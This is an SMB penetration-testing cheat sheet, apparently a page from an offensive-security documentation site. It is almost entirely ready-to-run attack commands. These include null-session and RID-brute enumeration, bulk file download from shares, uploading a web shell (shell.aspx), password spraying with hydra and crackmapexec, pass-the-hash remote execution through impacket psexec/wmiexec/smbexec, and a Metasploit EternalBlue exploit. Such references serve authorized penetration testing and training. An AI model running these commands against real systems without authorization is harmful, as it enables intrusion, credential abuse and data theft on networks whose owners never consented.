Directory & DNS
139 / 445 - SMB
SMB enumeration and exploitation: null sessions, share listing, credential spraying, and relay attacks.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
SMB enumeration and exploitation: null sessions, share listing, credential spraying, and relay attacks.
nmap -sV -sC -p 139,445 TARGET
smbclient -L //TARGET -N
smbclient -L //TARGET -U user%password
crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u user -p password --shares
smbmap -H TARGET
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -R # Recursive
enum4linux-ng TARGET -A
smbclient //TARGET/share -N
rpcclient -U "" -N TARGET
rpcclient -U "" -N TARGET
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> lookupnames administrator
> getdompwinfo
smbclient //TARGET/sharename -U user%password
smb: \> get secret.txt
smb: \> mget *.txt
smbclient //TARGET/share -U user%password -c "recurse; prompt off; mget *"
smb: \> put shell.aspx
crackmapexec smb TARGET -u users.txt -p passwords.txt
crackmapexec smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success
hydra -L users.txt -P passwords.txt smb://TARGET
crackmapexec smb TARGET -u '' -p '' --rid-brute
enum4linux-ng TARGET -R
impacket-lookupsid domain.local/user:password@TARGET
impacket-psexec domain.local/user:password@TARGET
impacket-psexec -hashes :NTLM_HASH administrator@TARGET
impacket-wmiexec domain.local/user:password@TARGET
impacket-smbexec domain.local/user:password@TARGET
crackmapexec smb TARGET -u Administrator -H NTLM_HASH
impacket-psexec -hashes :NTLM_HASH Administrator@TARGET
nmap -p 445 --script smb-vuln-ms17-010 TARGET
# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
run
nmap -p 445 --script smb-vuln-cve-2017-7494 TARGET
nmap -p 445 --script smb-enum-shares TARGET
nmap -p 445 --script smb-enum-users TARGET
nmap -p 445 --script smb-os-discovery TARGET
nmap -p 445 --script smb-vuln* TARGET
nmap -p 445 --script smb-protocols TARGET
| Check | Command |
|---|---|
| List shares | smbclient -L //TARGET -N |
| Null session | rpcclient -U "" -N TARGET |
| RID brute | crackmapexec smb TARGET -u '' -p '' --rid-brute |
| Recursive list | smbmap -H TARGET -R |
| PsExec | impacket-psexec user:pass@TARGET |
| EternalBlue | nmap --script smb-vuln-ms17-010 TARGET |